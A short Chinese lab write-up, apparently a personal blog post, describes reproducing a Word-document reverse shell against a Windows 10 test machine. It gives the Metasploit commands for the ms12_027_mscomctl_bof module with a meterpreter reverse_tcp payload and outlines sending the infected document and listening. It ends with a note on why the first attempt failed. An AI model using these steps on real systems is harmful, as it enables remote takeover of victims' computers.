word反弹shell复现(msf生成木马文档)

2019-09-28  本文已影响0人  草莓养殖户

环境

靶机:win10

攻击机:kali 2.0

软件版本:word office 2010 破解版 64位

use windows/fileformat/ms12_027_mscomctl_bof

set payload windows/meterpreter/reverse_tcp

直接生成了一个带毒文档。把文档发送到靶机上。

然后设置监听

最后在靶机上打开文档。

还是跟上一次结果一样,未成功反弹shell。

实验未成功,错在我默认打开doc文档是用wps。用wordoffice2010 打开后正常。

上一篇下一篇

猜你喜欢

热点阅读